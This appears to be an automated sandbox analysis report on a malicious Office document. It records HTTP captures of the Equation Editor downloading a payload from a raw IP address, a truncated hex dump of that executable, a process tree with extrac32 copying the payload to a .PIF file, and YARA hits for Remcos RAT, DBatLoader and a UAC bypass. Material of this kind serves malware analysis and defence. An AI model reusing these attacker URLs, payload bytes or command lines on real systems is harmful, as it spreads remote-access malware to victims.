                                                    May 23, 2024 20:20:57.982094049 CEST321INHTTP/1.1 200 OK
                                                    Date: Thu, 23 May 2024 18:20:57 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                    Last-Modified: Thu, 23 May 2024 07:10:38 GMT
                                                    ETag: "913a-61919bf834b98"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 37178
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: application/msword
                                                    May 23, 2024 20:20:58.200534105 CEST321INHTTP/1.1 200 OK
                                                    Date: Thu, 23 May 2024 18:20:57 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                    Last-Modified: Thu, 23 May 2024 07:10:38 GMT
                                                    ETag: "913a-61919bf834b98"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 37178
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: application/msword


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    6192.168.2.2249167188.114.96.380
                                                    TimestampBytes transferredDirectionData
                                                    May 23, 2024 20:21:01.174150944 CEST148OUTOPTIONS / HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Cookie: short_4348=1
                                                    User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                    translate: f
                                                    Host: qr-in.com
                                                    May 23, 2024 20:21:01.754220009 CEST737INHTTP/1.1 405 Not Allowed
                                                    Date: Thu, 23 May 2024 18:21:01 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YSx4XsyZqF5jzRe2OfN2nQsKpjTGqrDF9QU5qfJktdNbjrOr6iZliW5QQgyqe2qAbvsRjC21LtLjL2e8VSYCcLvl7H%2BlfHyeAWblrNuQcRbgIuNgavHIEgfRuyk%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8887103538de42c7-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.224916894.156.67.72803460C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    TimestampBytes transferredDirectionData
                                                    May 23, 2024 20:21:02.449398041 CEST280OUTHEAD /xampp/hgnn/hgn/lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions.doc HTTP/1.1
                                                    User-Agent: Microsoft Office Existence Discovery
                                                    Content-Length: 0
                                                    Connection: Keep-Alive
                                                    Host: 94.156.67.72
                                                    May 23, 2024 20:21:03.089210987 CEST321INHTTP/1.1 200 OK
                                                    Date: Thu, 23 May 2024 18:21:02 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                    Last-Modified: Thu, 23 May 2024 07:10:38 GMT
                                                    ETag: "913a-61919bf834b98"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 37178
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: application/msword


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.224916994.156.67.72803668C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    TimestampBytes transferredDirectionData
                                                    May 23, 2024 20:21:04.512393951 CEST313OUTGET /4020/csrss.exe HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: 94.156.67.72
                                                    Connection: Keep-Alive
                                                    May 23, 2024 20:21:05.206437111 CEST1236INHTTP/1.1 200 OK
                                                    Date: Thu, 23 May 2024 18:21:05 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                    Last-Modified: Thu, 23 May 2024 07:42:57 GMT
                                                    ETag: "153000-6191a33203e60"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 1388544
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: application/lnk
                                                    Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 d4 05 00 00 58 0f 00 00 00 00 00 28 ec 05 00 00 10 00 00 00 f0 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 [TRUNCATED]
                                                    Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*X(@@@@%kF.text `.itextp<> `.dataP@.bss6.idata@%@&@.tls4p.rdata@@.relockl@B.rsrct@@0@@
                                                    May 23, 2024 20:21:05.206705093 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii: @Boolean@FalseTrue@,@Char@@IntegerX@Bytel@Word@Car
                                                    May 23, 2024 20:21:05.206844091 CEST1236INData Raw: 7a 08 df 3a c3 90 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 8b 48 30 89 4a 30 df 7a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 8d 40 00 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 df 68 30 8b 48 38 89 4a 38 df 7a 30 df 7a 28
                                                    Data Ascii: z:(hhhh h(H0J0z(z zzz:@(hhhh h(h0H8J8z0z(z zzz:(hhhh h(h0h8H@J@z8z0z(z zzz:@y,l|<x,<DD@,<xH9Jt
                                                    May 23, 2024 20:21:05.206856012 CEST1236INData Raw: 1c 07 53 00 39 cf 72 26 8b 35 18 07 53 00 0f b7 4b 1a 8d 91 30 0b 00 00 39 d7 72 02 89 cf 29 fe 29 3d 1c 07 53 00 89 35 18 07 53 00 eb 21 0f b7 43 1a 89 c7 e8 e5 fc ff ff 89 c6 85 c0 75 10 a2 14 07 53 00 88 03 5f 5e 5b c3 80 64 37 fc f7 8d 4f 06
                                                    Data Ascii: S9r&5SK09r))=S5S!CuS_^[d7ON1SFFsF KS){p_^[%St?jv%St)j`=,0u#$S
                                                    May 23, 2024 20:21:05.207298040 CEST1236INData Raw: b8 00 01 00 00 f0 0f b0 25 14 07 53 00 74 0b 51 6a 0a e8 2b f5 ff ff 59 eb ce bb 0f 00 00 00 23 5e fc 09 eb 89 5e fc 89 cb 8b 57 fc f6 c2 01 75 09 83 ca 08 89 57 fc eb 17 90 89 f8 83 e2 f0 01 d3 01 d7 81 fa 30 0b 00 00 72 05 e8 ee f6 ff ff 89 5f
                                                    Data Ascii: %StQj+Y#^^WuW0r_CD.0r.S]_^[to]_^[G,9=IStO%St'QRjfZY%StQRjL
                                                    May 23, 2024 20:21:05.207313061 CEST1236INData Raw: 81 78 f4 00 10 00 00 75 1b 8b 45 08 f6 40 f8 e6 74 12 8b 45 08 f6 40 f9 01 75 09 8b c3 83 c0 b4 3b 18 74 04 33 c0 eb 02 b0 01 84 c0 74 25 83 c3 dc 8b 1b 85 db 74 1a 8b 45 08 50 8d 56 01 8b c3 83 e8 b4 e8 5a ff ff ff 59 84 c0 75 04 33 c0 eb 02 b0
                                                    Data Ascii: xuE@tE@u;t3t%tEPVZYu3^[]@US3ErU3(Yu3[]=ISt4 j'S34tj'S3u='Sujhhj{'S='S
                                                    May 23, 2024 20:21:05.207323074 CEST776INData Raw: c6 03 0d 43 c6 03 0a 43 8b 85 e8 47 fe ff 40 8b d3 e8 84 f9 ff ff 8b d8 c6 03 20 43 c6 03 2d 43 c6 03 20 43 8b d3 8b 85 e4 47 fe ff e8 69 f9 ff ff 8b d8 b8 bc 29 40 00 b9 08 00 00 00 8b d3 e8 72 fa ff ff 8b d8 c6 85 f6 47 fe ff 01 eb 08 c6 03 2c
                                                    Data Ascii: CCG@ C-C CGi)@rG,C Crt*)@C9)@.$F CxC COGGGG
                                                    May 23, 2024 20:21:05.207356930 CEST1236INData Raw: c0 30 3d 30 0b 00 00 73 05 b8 30 0b 00 00 05 d0 04 00 00 c1 e8 0d 83 f8 07 76 05 b8 07 00 00 00 8b c8 b2 ff d2 e2 88 53 e5 c1 e0 0d 66 05 30 0b 66 89 43 fc 0f b7 7b e6 0f b7 c7 8b c8 c1 e1 04 8d 0c 49 81 c1 ef 00 00 00 81 e1 00 ff ff ff 83 c1 30
                                                    Data Ascii: 0=0s0vSf0fC{I00ss0s0v0 3fff%f0fC N0SSSSS@Nu'S'S'S'S_^[@SVWUS'S{
                                                    May 23, 2024 20:21:05.207369089 CEST1236INData Raw: e3 ff ff 85 c0 74 0b 8b 04 24 a3 08 f0 45 00 59 5a c3 e8 6b e3 ff ff a3 08 f0 45 00 59 5a c3 8d 40 00 53 31 db 69 93 08 f0 45 00 05 84 08 08 42 89 93 08 f0 45 00 f7 e2 89 d0 5b c3 8b c0 66 a3 24 f0 45 00 db e2 d9 2d 24 f0 45 00 c3 90 6a 00 d9 3c
                                                    Data Ascii: t$EYZkEYZ@S1iEBE[f$E-$Ej<$X<$XZ=(St(SSHftIfs3=St=Su3gt[@P@SV3Cf=r/f=w)f%f=u
                                                    May 23, 2024 20:21:05.208509922 CEST1236INData Raw: 00 00 00 24 f4 12 40 00 00 00 00 00 80 96 98 16 40 00 00 00 00 00 20 bc be 19 40 00 00 00 00 00 28 6b ee 1c 40 00 00 00 00 00 f9 02 95 20 40 00 00 00 00 40 b7 43 ba 23 40 00 00 00 00 10 a5 d4 e8 26 40 00 00 00 00 2a e7 84 91 2a 40 00 00 00 80 f4
                                                    Data Ascii: $@@ @(k@ @@C#@&@**@ -@1_0@4@.7@@v:k:@#>@bxA@z&D@n2xH@W?hK@N@@aQYR@oU@: 'X@x9?\@6_@Ng
                                                    May 23, 2024 20:21:05.220832109 CEST1236INData Raw: 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 8b f1 89 55 fc 8b f8 33 c0 55 68 c0 39 40 00 64 ff 30 64 89 20 33 c0 89 06 8b 55 fc 8b 07 e8 63 00 00 00 8b d8 85 db 74 31 8b 43 14 85 c0 74 13 03 f8 89 3e 83 3e 00 74 21 8b 06 50 8b 00 ff 50 04 eb
                                                    Data Ascii: @USVW3]U3Uh9@d0d 3Uct1Ct>>t!PPMSrU%>3ZYYdh9@E$?_^[YY]SVCt)2;0ur;pur;pur;ptIu[t1^[SVtuu3


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.2249174178.237.33.50803832C:\Users\user\AppData\Roaming\csrss.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 23, 2024 20:21:14.385339975 CEST71OUTGET /json.gp HTTP/1.1
                                                    Host: geoplugin.net
                                                    Cache-Control: no-cache
                                                    May 23, 2024 20:21:15.016427994 CEST1171INHTTP/1.1 200 OK
                                                    date: Thu, 23 May 2024 18:21:14 GMT
                                                    server: Apache
                                                    content-length: 963
                                                    content-type: application/json; charset=utf-8
                                                    cache-control: public, max-age=300
                                                    access-control-allow-origin: *
                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                    Data Ascii: { "geoplugin_request":"8.46.123.175", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.224917113.107.137.114433832C:\Users\user\AppData\Roaming\csrss.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-23 18:21:09 UTC213OUTGET /download?resid=77E389B66C951B09%21132&authkey=!AD_QXcfalkvUogo HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: onedrive.live.com
                                                    2024-05-23 18:21:09 UTC1177INHTTP/1.1 302 Found
                                                    Cache-Control: no-cache, no-store
                                                    Pragma: no-cache
                                                    Content-Type: text/html
                                                    Expires: -1
                                                    Location: https://f3rtrw.bl.files.1drv.com/y4mAd3mcZPGImnMlQzVaLUaRGLF5rJ6dTRnmjMGEyxD33cnd2H9ImAFk6GH06rI3KMck3E5QUfcOZPhU0B_mNBna_nyngKFXWZTgNv1Ad3jtIplPy67HUT-H_QI_UQ9DMwQ1Mw40Qfz7bufwo4viHXiyRAZxjv_qhPoUnTrLgVmg_gVla9MxR1noVOE8U1BgeDUf4MHErdqC2SHkPpnmgC_fA/233_Efftwcmkvbf?download&psid=1
                                                    Set-Cookie: E=P:h9d+HlV73Ig=:VBd55ev/Q/M2EpbBJQ6HFt/TZL/Otwd47B3y8fOsfbY=:F; domain=.live.com; path=/
                                                    Set-Cookie: xid=3cfaba30-6c25-4c90-921b-7e95e541cb81&&ODSP-ODWEB-ODCF&183; domain=.live.com; path=/
                                                    Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                    Set-Cookie: LD=; domain=.live.com; expires=Thu, 23-May-2024 16:41:09 GMT; path=/
                                                    Set-Cookie: wla42=; domain=live.com; expires=Thu, 30-May-2024 18:21:09 GMT; path=/
                                                    X-Content-Type-Options: nosniff
                                                    Strict-Transport-Security: max-age=31536000
                                                    X-MSNServer: 7dfffcfdb8-4ngz8
                                                    X-ODWebServer: nameastus2708987-odwebpl
                                                    X-Cache: CONFIG_NOCACHE
                                                    X-MSEdge-Ref: Ref A: 6A76E8B8CFC54ED199F035F056A3835A Ref B: BN3EDGE0321 Ref C: 2024-05-23T18:21:09Z
                                                    Date: Thu, 23 May 2024 18:21:09 GMT
                                                    Connection: close
                                                    Content-Length: 0


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:14:20:30
                                                    Start date:23/05/2024
                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                    Imagebase:0x13f510000
                                                    File size:28'253'536 bytes
                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:4
                                                    Start time:14:20:52
                                                    Start date:23/05/2024
                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                                    Imagebase:0x13f6d0000
                                                    File size:1'423'704 bytes
                                                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:14:21:02
                                                    Start date:23/05/2024
                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                    Imagebase:0x400000
                                                    File size:543'304 bytes
                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:14:21:06
                                                    Start date:23/05/2024
                                                    Path:C:\Users\user\AppData\Roaming\csrss.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Roaming\csrss.exe"
                                                    Imagebase:0x400000
                                                    File size:1'388'544 bytes
                                                    MD5 hash:913C99449A29C2640D36B0D5FDF69289
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Borland Delphi
                                                    Yara matches:
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.1012207860.0000000033DAB000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 21%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:9
                                                    Start time:14:21:11
                                                    Start date:23/05/2024
                                                    Path:C:\Windows\SysWOW64\extrac32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\csrss.exe C:\\Users\\Public\\Libraries\\Efftwcmk.PIF
                                                    Imagebase:0x650000
                                                    File size:53'248 bytes
                                                    MD5 hash:4D306ED01994EDF577B98FD59BF269C0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:14:21:24
                                                    Start date:23/05/2024
                                                    Path:C:\Users\Public\Libraries\Efftwcmk.PIF
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\Public\Libraries\Efftwcmk.PIF"
                                                    Imagebase:0x400000
                                                    File size:1'388'544 bytes
                                                    MD5 hash:913C99449A29C2640D36B0D5FDF69289
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Borland Delphi
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.463489236.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    Antivirus matches:
                                                    • Detection: 21%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:14:21:32
                                                    Start date:23/05/2024
                                                    Path:C:\Users\Public\Libraries\Efftwcmk.PIF
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\Public\Libraries\Efftwcmk.PIF"
                                                    Imagebase:0x400000
                                                    File size:1'388'544 bytes
                                                    MD5 hash:913C99449A29C2640D36B0D5FDF69289
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Borland Delphi
                                                    Yara matches:
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.484496833.00000000272CB000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.479146346.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    Call Graph

                                                    • Entrypoint
                                                    • Decryption Function
                                                    • Executed
                                                    • Not Executed
                                                    • Show Help
                                                    callgraph 1 Error: Graph is empty

                                                    Module: Sheet1

                                                    Declaration
                                                    LineContent
                                                    1

                                                    Attribute VB_Name = "Sheet1"

                                                    2

                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                    3

                                                    Attribute VB_GlobalNameSpace = False

                                                    4

                                                    Attribute VB_Creatable = False

                                                    5

                                                    Attribute VB_PredeclaredId = True

                                                    6

                                                    Attribute VB_Exposed = True

                                                    7

                                                    Attribute VB_TemplateDerived = False

                                                    8

                                                    Attribute VB_Customizable = True

                                                    Module: Sheet2

                                                    Declaration
                                                    LineContent
                                                    1

                                                    Attribute VB_Name = "Sheet2"

                                                    2

                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                    3

                                                    Attribute VB_GlobalNameSpace = False

                                                    4

                                                    Attribute VB_Creatable = False

                                                    5

                                                    Attribute VB_PredeclaredId = True

                                                    6

                                                    Attribute VB_Exposed = True

                                                    7

                                                    Attribute VB_TemplateDerived = False

                                                    8

                                                    Attribute VB_Customizable = True

                                                    Module: Sheet3

                                                    Declaration
                                                    LineContent
                                                    1

                                                    Attribute VB_Name = "Sheet3"

                                                    2

                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                    3

                                                    Attribute VB_GlobalNameSpace = False

                                                    4

                                                    Attribute VB_Creatable = False

                                                    5

                                                    Attribute VB_PredeclaredId = True

                                                    6

                                                    Attribute VB_Exposed = True

                                                    7

                                                    Attribute VB_TemplateDerived = False

                                                    8

                                                    Attribute VB_Customizable = True

                                                    Module: ThisWorkbook

                                                    Declaration
                                                    LineContent
                                                    1

                                                    Attribute VB_Name = "ThisWorkbook"

                                                    2

                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                    3

                                                    Attribute VB_GlobalNameSpace = False

                                                    4

                                                    Attribute VB_Creatable = False

                                                    5

                                                    Attribute VB_PredeclaredId = True

                                                    6

                                                    Attribute VB_Exposed = True

                                                    7

                                                    Attribute VB_TemplateDerived = False

                                                    8

                                                    Attribute VB_Customizable = True

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:6.1%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:9.2%
                                                      Total number of Nodes:687
                                                      Total number of Limit Nodes:34
                                                      execution_graph 33354 33d74887 33355 33d74893 ___BuildCatchObject 33354->33355 33383 33d74596 33355->33383 33357 33d7489a 33359 33d748c3 33357->33359 33504 33d749f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 33357->33504 33367 33d74902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 33359->33367 33394 33d84251 33359->33394 33363 33d748e2 ___BuildCatchObject 33364 33d74962 33402 33d74b14 33364->33402 33367->33364 33505 33d833e7 38 API calls 5 library calls 33367->33505 33371 33d7497d 33506 33d832f6 GetModuleHandleW 33371->33506 33373 33d74984 33374 33d7498e 33373->33374 33507 33d8341f 28 API calls _abort 33373->33507 33375 33d74997 33374->33375 33508 33d833c2 28 API calls _abort 33374->33508 33509 33d7470d 13 API calls 2 library calls 33375->33509 33379 33d7499f 33379->33363 33384 33d7459f 33383->33384 33510 33d74c52 IsProcessorFeaturePresent 33384->33510 33386 33d745ab 33511 33d78f31 33386->33511 33388 33d745b0 33389 33d745b4 33388->33389 33520 33d840bf 33388->33520 33389->33357 33392 33d745cb 33392->33357 33397 33d84268 33394->33397 33395 33d74fcb CatchGuardHandler 5 API calls 33396 33d748dc 33395->33396 33396->33363 33398 33d841f5 33396->33398 33397->33395 33400 33d84224 33398->33400 33399 33d74fcb CatchGuardHandler 5 API calls 33401 33d8424d 33399->33401 33400->33399 33401->33367 33578 33d76e90 33402->33578 33405 33d74968 33406 33d841a2 33405->33406 33580 33d8f059 33406->33580 33408 33d841ab 33409 33d74971 33408->33409 33584 33d86815 38 API calls 33408->33584 33411 33d47716 33409->33411 33415 33d4e9c5 33409->33415 33501 33d4d069 33409->33501 33412 33d4772a 33411->33412 33768 33d53549 RegOpenKeyExA 33412->33768 33414 33d47731 33414->33371 33771 33d5cb50 